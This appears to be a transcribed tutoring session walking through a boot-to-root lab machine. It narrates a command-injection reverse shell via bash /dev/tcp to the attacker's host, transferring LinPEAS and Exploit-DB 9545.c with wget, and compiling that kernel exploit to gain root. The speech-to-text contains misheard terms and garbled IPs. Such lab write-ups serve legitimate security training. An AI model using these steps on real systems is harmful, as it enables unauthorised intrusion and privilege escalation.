are looking for something. So we have found that this website is vulnerable. First is by using the login bypass page, and secondly, the command injection. So here we can open a shell. We can open a reverse shell here with the help of this command injection. Okay. So here, what we can try, we will open a reverse injection attack, like reverse shell here with the help of command injection. So here we can open a listener, which is NVLP on port number 1224. So this is my listener. Now here I will apply a command. Let's see. We can here use, we want a bash. So here we can use .1 semicolon. Okay, we want a bash as a -i as an interface. And then here we want to use dev means devices. TCP, we want a TCP reverse connection, and the reverse connection goes to the Kali machine, which is 192.168.137, maybe. The IP address of Kali machine, I guess, 137. On port number 1224, and then this sign. This is for the null sign. Okay, and click on submit. When I click on submit this command, and here the listener is open, and when I click on submit, you can see this will keep on moving, but here we get the bash of the target machine. If I type here, who am I? So we are an Apache user, which means we are inside the Q-Patrick's level 2nd, but as a normal user. But our mission here is to get a root access. So we have to hack this machine further because we are inside the machine, but as a normal user. If I move inside root, I don't have the permission because here we are a normal user. So we have to gain the higher access here. Okay. So for that, that process is known as privilege acceleration. Okay.
Okay.
That process is known as
Yeah.
privilege acceleration, which is gaining from normal user to high user within the machine. So we are inside machine. Now we have to gain the root access. So we will gain some other information inside the machine. So with this, with the help of this application, let me open that. We have an application known as uh, LinPiece.
Okay.
It is a most powerful application. Even you can use this application anywhere you want. It is a
Okay.
application, or it is, we can say, a script which you will run inside the target machine to gain further information inside the target machine, like how many users are there, how many files are there, what kind of services are running, and so on, like automatically. So it is like a
Okay.
automate script. So here we
Mm-hmm.
have this, how we can run this. So we can run this command directly, which is this command. So let me copy this, Control C, and
Mm-hmm.
here we can paste it. So we will paste inside. You can move inside temp first, and here we can
Yeah.
paste it.
Mm-hmm.
Now it is not working because of some reason. So what we will
Yeah.
do, we will install this script first inside my machine, and then we will share inside the target machine.
Yeah.
Okay, for this, we have to clone this machine, this script. So for cloning, we can simply use here. So I am inside my machine. Let's move on desktop. And
Yeah.
here we can use curl and this command. We have run 2 times curl. So we have to remove one curl. Curl is a command used for downloading a script. Let's see if
Okay.
we have, no, something is wrong. Or we can use, in place of curl, we can use wget.
Okay.
Connected. Okay, here you can see the file is in my machine now. linpiece.sh. Now here we can start the Python server here, which is Python -m http.server. Let's say one. You can use any port here, 1345. So now Python is running on this particular port number. Now we will download this lin piece from my Linux to this target machine. So here we can also use wget, and here HTTP IP address of the Linux 192.168.137. Port number is 1345. Name of your file is linpiece.sh. Okay, here you can see 100% downloaded. ls. So this is my file. Now we can easily run this file inside this machine. So how we can run this? We can check out the manual for running this file. We can use simply ./linpiece.sh. Okay, ./linpiece.sh. Piece.sh. Permission. So we can give the permission using chmod linpiece.sh. Now we can run this command. linkpiece.sh. So again, it is a very, very powerful script. Even if you are giving the exam for the OSCP, then you can use this script. It is like automate script which will tell you everything about this machine. Okay, you can see this is the basic information. This is the Linux version, exact Linux version, which is 2.6.9. CentOS it is using. Okay, and these are the user and group. The host name is Qpatrick's level second. Then linpiece I discover host, learn more about. Okay, so it is now getting the directories. And here you can see we have lots of information. So this information is about this machine only. Okay, for example, let's say we have this environment variables which we can use. We have this unmounted devices which we can use. Again, we have lots of ways of hacking or gaining privilege acceleration. So this tool is specially for gaining the information inside the machine so that you can gain the higher access. Okay, rest we have some other information like you can see these are the protection mechanism applied in the machine. Some containers here, if any, which no containers here like Docker or Kubernetes, etc. No cloud services. These are the services running inside the target machine. Okay, you can see which running is running as a root user, which running as a normal user. And here we have some other processes, PIDs, and Chrome tabs, Chrome jobs, and these are some path here, which we don't have any specific path. Unix sockets here, bus configure files here, network information here. You can see the network details of this machine. These are some active ports, some user information. Okay, even we have this PGP keys, okay, for the SSL and sorry, SSH. Then here we have this user and groups here. These are the usernames here, last login information here, logs here, software information. These are the softwares inside machine and so on. So you can see we have a whole bunch of details here. So you can use this machine every time you are gaining the privilege acceleration in the machine. So now what we can do, we are targeting this machine. And in the previous nmap scan, we have found this machine is running Linux kernel 2.6. So what we can do is we can find an exploit for this particular Linux kernel. So we can search for, here we can search for the exploit DB. And here we can search for here. Now the Linux, this one is running CentOS. So we can search for CentOS. Enter. And we are looking for a specific version, so we can narrow down the search result by putting here 2.6, let's say. So we have this result here, and here you can notice we have this Linux kernel 2.6, Linux kernel 2.6, Linux kernel 2.4.x, and here you can see the 2.4.2.6.x and CentOS. So right click here, open this in new tab. We can also open this in new tab. So we can open multiple scripts here in this one. So we found 3 scripts with the 2.6 Linux kernel with CentOS. So this one is CentOS using, this one is also using CentOS, and this one is not, yeah, it is also using, oh, Aram sir, careful. This is also using CentOS. So which one we have to look for? We have this one script. So we can try these 3 scripts. Okay. Because we are not sure which CentOS it is using. So we can try this one also, and this one also. Okay. So first we will try this 9545.c file. Click on this download option here. Okay, now this machine, this 9545.c is in my machine. So what we will do, we have to transfer this in the Linux machine, in the target machine. So first, we will open a new tab and we will copy this file from the downloads. So we'll move inside downloads. And here we will copy, or we can simply move this 9545.c to the home Kali desktop.
Yeah.
Because our server is running on the desktop. That is why. Okay, now we will move here, and here we can again use wget http IP address of the Kali machine, which is 168.1.37. Port number is 1345, and name of file, port number 1345. Name of the file is 9545.c. Okay, and ls. So we have this file. Now this is a C file, and for running C file, we have to first compile it. Then only we can run it. So for compilation process, we can use here GCC. GCC is a C compiler. If you ever use C language, then you know you cannot run .c file directly. Before running C file, we have to compile it first. So here we are
Yeah.
compiling, and compile here. This is a compiler, GCC. Compilation means you are just converting the C language into the language which your machine can understand, like 0 and 1. That is like compilation processes. So GCC is a compiler here, and hyphen O. O is like name of your file after compilation. So let's say my name of file will be exploit. You can name it anything you want. And then the file you want to compile. So here I want to compile 9545.c. Okay, now compilation is done. You can check here exploit. Now if you run this exploit file like ./exploit, let's see if this will work or not. And here you can see we were in the bash. Now we are inside shell here. If I type who am I, so we are a root user here. You can see here. So we have successfully gained access as a root user, root access.
Yeah.
And here we can do anything. We can move inside root and we can do any number of operation here. So the main task is to gain access as a root user. Okay. So now how I know that this script will work, or we have to look for the kernel, or we have to look for the exploit. How do I know? See, whenever we are hacking any machine, we have to look for something like first we have to look for the open ports. If all ports are closed, or if no port are vulnerable, then what we can do, we can look for the website. Okay, so first step is to check for the open ports, and in the open ports, we are checking for if the ports are vulnerable or not. If ports are vulnerable, then we can hack through ports. That we had seen in the Kubernetes level 1. But when we scan here in the nmap with the help of nmap, no, like few ports are open, and from those ports, no port is vulnerable. That is why we look for the website. In the website is vulnerable with two vulnerabilities. First, login page is vulnerable, which we have bypassed using SQL login bypass mechanism. And second, the web page, the main web page is vulnerable with the help of command injection. Okay, with the help of command injection, we have gained reverse, we can say access in the target machine. But as a normal user. Okay, and we have gained access with the help of reverse shell with the help of this particular script.
Yeah.
That is this one. Okay, by using bash. Okay, I will tell you where I get this script in a bit. So here we have gained access at the target machine. After gaining access, after gaining a shell, we have checked that we are a normal user. So I run another script which is known as linpiece.sh to gather more information about the target machine. Okay, so which we have used linpiece. So first we have downloaded linpiece inside the Kali machine. Then we have opened a shell here, a Python server here. After opening a Python server, we have moved inside the target machine, and then we have used wget to download the shell file, which is like lin piece file from my Kali machine to the target machine. After downloading, we have run this sh file, lin piece file. From this piece file, we have gathered many information. Even there's like two or more ways of gaining access, as gaining a privilege acceleration. But we have used a most common or most used ways, that is hacking the kernel, Linux kernel. From this information, we have found that this machine is running Linux kernel 2.6. Even you have gained this information from the nmap only. Okay, when you run the nmap. So if you find that if there's a kernel and if you know the exact version of that kernel, exact version was 2.6, which is Linux kernel 2.6. Even with the Linux kernel, we know that machine is using CentOS. The server is of CentOS. So here we have much information. We have the exact same information. We have to look for the exploit, because whenever we are looking for the exploit, we have to look for the exact version, and then we have to look for the exact operating system. And we have both information: exact version also 2.6 and exact operating system, which is CentOS. So we have enough information for finding the exploit. That is why I have looked for the exploit. Okay, again,
Yeah.
if let's say if the exploit is unavailable, then we can look for any other way. But here we have found that three exploits are there: one, two, and three. So we have to try three exploit. If one is not working, we can try this one and this one, right?
Yeah.
But here, first exploit only works, which means this is a C file, and we have downloaded this C file in the Linux, transfer into the target machine, and then it is a C file. We have compiled it. After compiling, we have run it easily. Okay, this is the mechanism we have used. If let's say if exploit is unavailable, then we can look at to any other way of hacking. Okay, so
Yeah.
there's like many ways of hacking a machine, but we have looked for a most common ways like hacking a machine, or like gaining a higher access with the help of exploit. We can look for any other way also, like by exploiting the internal service of the machine, or exploiting any other mechanism within the machine, within the target machine. But we have found a exploit because we have the enough information for finding the exploit, the exact version and the exact operating system,
Yeah.
right? So that is why I have looked for the exploit. Otherwise, we can also hack this machine with the help of any other way. Okay, you can check out the other walkthrough of this Q-Patrick's level second, and you can try with any other way. But this is the most common way. Even if you are hacking any other machine, follow this approach. First, look for the open ports. Check for the if the ports are vulnerable. Second, look for the website. Check if the website is vulnerable. Try to hack the website. And whenever you are trying to hack the website, just try to gain access in the server. Okay, that is the main motto. After gaining access in the target machine, try to hack as a root user. And once you
Okay.
are a root user inside a target machine, then you have gained the complete access on the target machine. And that is the main motto of hacking, to gain the higher access. Okay. Is it clear the steps? Like, is there any doubt or any query?
Oh, that's fine. I mean, I need to go through it, but it's fine.
And for the exploit for this particular command, this one bash, you can search for, there's a GitHub repository. You can search for GitHub all bash. You can search for all PowerShell reverse. Yeah, we have this offensive reverse shell cheat sheet. So we can look for this one. Yeah, exactly. So we have this particular script which you can look for. Let's say your target is using Python
Yeah.
as a service. So you can go for the Python script, like Python one line script. Okay, if your target is using SSH, FTP or HTTP or other WordPress, Jenkins as a service, then you can go for any of the script here, like PowerShell, AWK, awk, and PHP and Ruby, etc. So we have many scripts here. For example, if I
Mhm.
click on this uh, Python, so these are one line scripts. These are bash scripts. Okay, it depends on what kind of technology your target is using. Okay, so this
Mhm.
script, this repository is very powerful and it will help you in any scenario in finding the right bash for your target. Okay, you can try multiple here. Here we have this reverse shell. Okay, like reverse shell.bat, ASPX, okay, etc. You can search for the web shells here. These are some common web shells which we used and etc. It depends on what kind of service your target is using. Okay, for the
Okay.
PHP we have, and here you can see this is the script I have used, bash.
Mhm.
Okay, this is the same script. So I have take this script from here only. Okay, I don't know. Okay, like previously if we have the script like this, but
Mhm.
when I was solving this machine, I came to know this platform like this
Okay.
offensive reverse shell cheat sheet, and from there I pick up. I have tried many script, but this will work. Okay,
Okay.
this is like the common script which will work in most of the scenario. But if your target is using any specific technology like Python, PHP, then you can use as per that particular scenario. Okay,
Mhm. Yeah.
so I will share this URL. You can bookmark this one because you can use it in the future scenario whenever you are hacking some other machines. Okay, is it clear this much?
Yeah, that's fine.
So I will share the steps for hacking this machine and you
Okay.
can try this. Okay, if you have any doubt like in hacking or any error, then you can ping me on WhatsApp or we can solve this tomorrow. Okay,
Okay. That's fine.
tomorrow we
Cool.
will discuss some like cryptography and some other mechanism like some other tools and technologies.
Okay.
Okay,
Yeah.
okay, so rest we will continue tomorrow. Thank you.
Good. Thank you. Bye.